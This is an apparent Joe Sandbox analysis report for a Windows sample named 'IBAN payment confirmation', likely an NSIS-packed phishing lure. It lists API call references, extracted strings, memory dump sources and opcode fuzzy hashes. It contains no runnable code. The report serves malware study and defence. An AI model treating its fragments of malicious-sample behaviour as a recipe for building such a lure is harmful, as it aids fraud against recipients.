                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5c2267c253dc83ef2662f92aaffc62d0b26ebbc7d32ed9fea3321c467c282c1a
                                                                                                                              • Instruction ID: aecef42f1fa4b5ffad3aba0df17c7687af4c7dfb8551ffaa5b8242d638fb4fad
                                                                                                                              • Opcode Fuzzy Hash: 5c2267c253dc83ef2662f92aaffc62d0b26ebbc7d32ed9fea3321c467c282c1a
                                                                                                                              • Instruction Fuzzy Hash: A1F0A73071C3801FE716277D6811BBF2BAA9FC6385F15407AE501DB255DF909D0783A2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 62d47c04fc361ded366ff104c3459984251a20f70f28eaa3704611bac7f4006d
                                                                                                                              • Instruction ID: 8d80bff3a570e919dfffa61d811cb72b428e072f8706fdb3aa8d67257eb41c32
                                                                                                                              • Opcode Fuzzy Hash: 62d47c04fc361ded366ff104c3459984251a20f70f28eaa3704611bac7f4006d
                                                                                                                              • Instruction Fuzzy Hash: 9DE01A70066F42DFE3021B60AC6C66A7BB8FB0B317B842C54A04A82072CB780854C755
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 098b408c170f4632da96dfd1d74bb46bba8447849f44f5c96130b66fa0d8727a
                                                                                                                              • Instruction ID: bf35dcf58b93ef6b8431cedf7f991a0d291cfb66b5b79157e068d0647a1920b0
                                                                                                                              • Opcode Fuzzy Hash: 098b408c170f4632da96dfd1d74bb46bba8447849f44f5c96130b66fa0d8727a
                                                                                                                              • Instruction Fuzzy Hash: AAD0123191DBA14FC3278B797450198BFA0DD8A11530A45FAC088CF4629A64598AC796
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2c8af0f95b46a946754da2435531ed2928f579f66baecb5230bffa45b9215e67
                                                                                                                              • Instruction ID: 2c36ff6bbb80dce4b136275f07e4ca6b8f0fe4f22c4769c1dc125fab148878f0
                                                                                                                              • Opcode Fuzzy Hash: 2c8af0f95b46a946754da2435531ed2928f579f66baecb5230bffa45b9215e67
                                                                                                                              • Instruction Fuzzy Hash: 53C08033629720075325932D7C446CF59958FC63513008A3BF00C87104DD905D4B41CD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 66d7b8eba369bf16198b16ed5a8e13979bca3828e3e9797b268d8bb6714263a2
                                                                                                                              • Instruction ID: 03ec6956f786c8626c7762bc93387347caeed4f94da558ddf75e34a00bcd722f
                                                                                                                              • Opcode Fuzzy Hash: 66d7b8eba369bf16198b16ed5a8e13979bca3828e3e9797b268d8bb6714263a2
                                                                                                                              • Instruction Fuzzy Hash: 19C08C70010F098BF2042F54BC1CB79B3B8B707303FC42D10E10D428708BB85814C688
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 35e64e27f9e844279112c246a36b5a2679be29f6ae03538b9c5dfb81bb11f5a1
                                                                                                                              • Instruction ID: 5506d3bf153e386da1fe4458c343c7b16ad03a4e66128bc1160f8b5c5d16abe1
                                                                                                                              • Opcode Fuzzy Hash: 35e64e27f9e844279112c246a36b5a2679be29f6ae03538b9c5dfb81bb11f5a1
                                                                                                                              • Instruction Fuzzy Hash: 53C08C302747088FF2009B5DD584B8537ACEF89B04F0018A1F4048B621CA22FC008A09
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                                                                              • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404C06
                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                                                                              • ShowWindow.USER32(00000000), ref: 004050F1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                              • String ID: $M$N
                                                                                                                              • API String ID: 1638840714-813528018
                                                                                                                              • Opcode ID: f5222cf6d3fcdeff0966a9eee7e30bd6d921d2d03bb49bae54bf4b748700a109
                                                                                                                              • Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
                                                                                                                              • Opcode Fuzzy Hash: f5222cf6d3fcdeff0966a9eee7e30bd6d921d2d03bb49bae54bf4b748700a109
                                                                                                                              • Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58
                                                                                                                              APIs
                                                                                                                              • #17.COMCTL32 ref: 00403379
                                                                                                                              • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                                                • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                • Part of subcall function 00406254: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                              • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                                                • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                              • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                                                                                              • CharNextW.USER32(00000000,00434000,00000020), ref: 00403402
                                                                                                                              • GetTempPathW.KERNEL32(00000400,00436800,00000000,00000020), ref: 0040350B
                                                                                                                              • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040351C
                                                                                                                              • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403528
                                                                                                                              • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040353C
                                                                                                                              • lstrcatW.KERNEL32(00436800,Low), ref: 00403544
                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403555
                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040355D
                                                                                                                              • DeleteFileW.KERNEL32(00436000), ref: 00403571
                                                                                                                              • OleUninitialize.OLE32(?), ref: 00403621
                                                                                                                              • ExitProcess.KERNEL32 ref: 00403641
                                                                                                                              • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 0040364D
                                                                                                                              • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403659
                                                                                                                              • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403665
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040366C
                                                                                                                              • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
                                                                                                                              • CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036DA
                                                                                                                              • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                                                                              • ExitProcess.KERNEL32 ref: 004037BC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                              • API String ID: 4107622049-1875889550
                                                                                                                              • Opcode ID: f59da56ce79cf3752257f316979aefb191ab981252506581a540253af1472897
                                                                                                                              • Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
                                                                                                                              • Opcode Fuzzy Hash: f59da56ce79cf3752257f316979aefb191ab981252506581a540253af1472897
                                                                                                                              • Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: "$0op$Ljp$Ljp$Ljp$Ljp$Ljp$Ljp$Ljp$Ljp$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
                                                                                                                              • API String ID: 0-2493580614
                                                                                                                              • Opcode ID: a3bd374a0604e36949383408c93d34c700d329978450003c131d707b7d80fd7d
                                                                                                                              • Instruction ID: 396c02c43a2e3677df7fade6056eb2acfaa4d63e41a3f42509adbae729baa884
                                                                                                                              • Opcode Fuzzy Hash: a3bd374a0604e36949383408c93d34c700d329978450003c131d707b7d80fd7d
                                                                                                                              • Instruction Fuzzy Hash: C5328E74E012188FEB64CF65D994BDDBBB2BF89300F1081A9D809AB361DB759E85CF50
                                                                                                                              APIs
                                                                                                                              • DeleteFileW.KERNEL32(?,?,00436800,771B2EE0,00434000), ref: 0040579B
                                                                                                                              • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,00436800,771B2EE0,00434000), ref: 004057E3
                                                                                                                              • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,00436800,771B2EE0,00434000), ref: 00405806
                                                                                                                              • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,00436800,771B2EE0,00434000), ref: 0040580C
                                                                                                                              • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,00436800,771B2EE0,00434000), ref: 0040581C
                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                              • String ID: \*.*
                                                                                                                              • API String ID: 2035342205-1173974218
                                                                                                                              • Opcode ID: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                                                                                              • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                                                                              • Opcode Fuzzy Hash: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                                                                                              • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: "$0op$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
                                                                                                                              • API String ID: 0-69517759
                                                                                                                              • Opcode ID: f8c3e1f3bfa4a11819400188763ffe619fa9cb2daa352f561b77b15684b8adfe
                                                                                                                              • Instruction ID: f47215ba9f6c59c20b0e7f4e243548b186a60921b3df116e9376a3b94106c8b7
                                                                                                                              • Opcode Fuzzy Hash: f8c3e1f3bfa4a11819400188763ffe619fa9cb2daa352f561b77b15684b8adfe
                                                                                                                              • Instruction Fuzzy Hash: B40291B4E012188FEB68CF65D994BDDBBB2BF89300F1081A9D409A7361DB759E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                              • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                                                                              • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                              • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(00436800,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,00436800,?,771B2EE0,00405792,?,00436800,771B2EE0), ref: 00406238
                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406244
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2504128483.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 0000000B.00000002.2504077604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504164219.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504235398.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 0000000B.00000002.2504282391.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                              • String ID: WB
                                                                                                                              • API String ID: 2295610775-2854515933
                                                                                                                              • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                              • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
                                                                                                                              • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                              • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530929006.0000000039C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39C90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39c90000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 28d4f9a5c67e2d6a12645a8d318660bd3c690d2da2ef9e3c813f5e24ee2aec1d
                                                                                                                              • Instruction ID: ce0d921b36b96a09c1d74e3de0ec211a9c4ec3ea249d0c5f280e229f34122279
                                                                                                                              • Opcode Fuzzy Hash: 28d4f9a5c67e2d6a12645a8d318660bd3c690d2da2ef9e3c813f5e24ee2aec1d
                                                                                                                              • Instruction Fuzzy Hash: 32628A74E01268CFEB65DF65C984BD9BBB2BB89300F1081EAD409AB355DB359E81CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1bf262c1d19971e41e324be20690760c8d190a37ad88583e2f60abd27797a6f9
                                                                                                                              • Instruction ID: 4934fc4b85904e76207219bbddbcdede02c3a446aab376433f3e2e9827bd9c9d
                                                                                                                              • Opcode Fuzzy Hash: 1bf262c1d19971e41e324be20690760c8d190a37ad88583e2f60abd27797a6f9
                                                                                                                              • Instruction Fuzzy Hash: 5AC1B278E01218CFEB14DFA5C990B9DBBB2BF89300F5081A9D409AB355DB359E85CF90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ee52ff61fe3b5fe3441958f749a3330715a10026e9089fbdf3b9782bfd7430a2
                                                                                                                              • Instruction ID: 2dae219273d3af9510d7138d641d773a26f0e19a303338412bf4959824c0192f
                                                                                                                              • Opcode Fuzzy Hash: ee52ff61fe3b5fe3441958f749a3330715a10026e9089fbdf3b9782bfd7430a2
                                                                                                                              • Instruction Fuzzy Hash: 93C1B078E01218CFEB14DFA5C994B9DBBB2BF89300F5081A9D409AB355DB359E86CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 37baf838b1e1edb9f86fb0fb3c6c9d7d0dfa1013cd5d08210f8c9459ef851261
                                                                                                                              • Instruction ID: e6e7bb29a85bd691969e003bcf009ba21f3e2facefcc742c03dc27a203bc14e7
                                                                                                                              • Opcode Fuzzy Hash: 37baf838b1e1edb9f86fb0fb3c6c9d7d0dfa1013cd5d08210f8c9459ef851261
                                                                                                                              • Instruction Fuzzy Hash: 8BC1B078E01218CFEB14DFA5C894B9DBBB2BF89300F5081A9D809AB355DB359E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 61b67a9be89d1e125a9b3c54ac3407fb36e2d83757647bd5eea9b0b34b2c96ad
                                                                                                                              • Instruction ID: 30829d58dffeeacbbddbd452fecfa4793edf1fc7a244c97596700f1079a17c30
                                                                                                                              • Opcode Fuzzy Hash: 61b67a9be89d1e125a9b3c54ac3407fb36e2d83757647bd5eea9b0b34b2c96ad
                                                                                                                              • Instruction Fuzzy Hash: ABC1B278E01218CFEB54DFA5C994B9DBBB2BF89300F5081A9D409AB355DB349E85CF90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 78580ecf7cdd1bdcac37ff5b524992154c17de8f97a5c1284c7eedbf864ccf56
                                                                                                                              • Instruction ID: 3f8aa87ab795f72d2ac626e563dec7980f20bf66a090eeb493b9312df956aff6
                                                                                                                              • Opcode Fuzzy Hash: 78580ecf7cdd1bdcac37ff5b524992154c17de8f97a5c1284c7eedbf864ccf56
                                                                                                                              • Instruction Fuzzy Hash: 6AC1C278E01218CFEB14DFA5C890B9DBBB2BF89304F6081A9D409AB355DB359E85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2530823711.0000000039830000.00000040.00000800.00020000.00000000.sdmp, Offset: 39830000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_39830000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6d0a090fd9ca1aa1b526223ff9b02c5f900cbc73cfd06cf44cc32d0b3a04f514
                                                                                                                              • Instruction ID: 31df652094cca7257925063f093e5e96ec6eeed902c39151be91858cc2e610e0
                                                                                                                              • Opcode Fuzzy Hash: 6d0a090fd9ca1aa1b526223ff9b02c5f900cbc73cfd06cf44cc32d0b3a04f514
